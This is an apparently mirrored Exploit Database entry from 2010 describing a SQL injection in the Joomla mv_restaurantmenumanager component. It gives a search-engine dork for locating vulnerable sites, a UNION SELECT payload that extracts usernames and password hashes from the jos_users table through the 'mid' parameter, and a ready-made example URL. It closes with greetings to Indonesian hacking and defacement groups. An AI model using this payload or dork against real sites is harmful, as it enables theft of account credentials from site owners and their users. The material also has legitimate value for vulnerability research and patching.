Joomla! Component mv_restaurantmenumanager – SQL Injection

• Exploit Database
• 125 阅读

• 作者： Sudden_death
  日期： 2010-04-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12162/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  ========================================================= Joomla component mv_restaurantmenumanager SQL injection Vulnerability =========================================================   # Exploit Title : joomla component mv_restaurantmenumanager SQL injection Vulnerability # Date: 12 april 2010 # Author: Sudden_death (suddendeath404@yahoo.com) # Software Link : N/A # Tested on : Windows XP 2 # Platform/Tested on: Windows XP 2 SP 2 # category: webapps/0day # myweb : http://suddendeath.000space.com/ # dork: inurl:option=com_mv_restaurantmenumanager # Code :+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users   ======================================================================   # EXPLOIT / c0de   +and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users     # VULN IN HERE   http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5[c0de<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5%5Bc0de>}       # EXAMPLE   http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users>     [#]-------------------------------------------------------------------   GREETZ TO WE FORUM: [ indonesianhacker[dot]com | indonesiandefacer[dot]org ]   [#]-------------------------------------------------------------------   MY BROTHA : | MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster | | kaMtiEz | Man In Black | otong | r3m1ck&apos;s | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | | cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |   [#]-------------------------------------------------------------------   note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!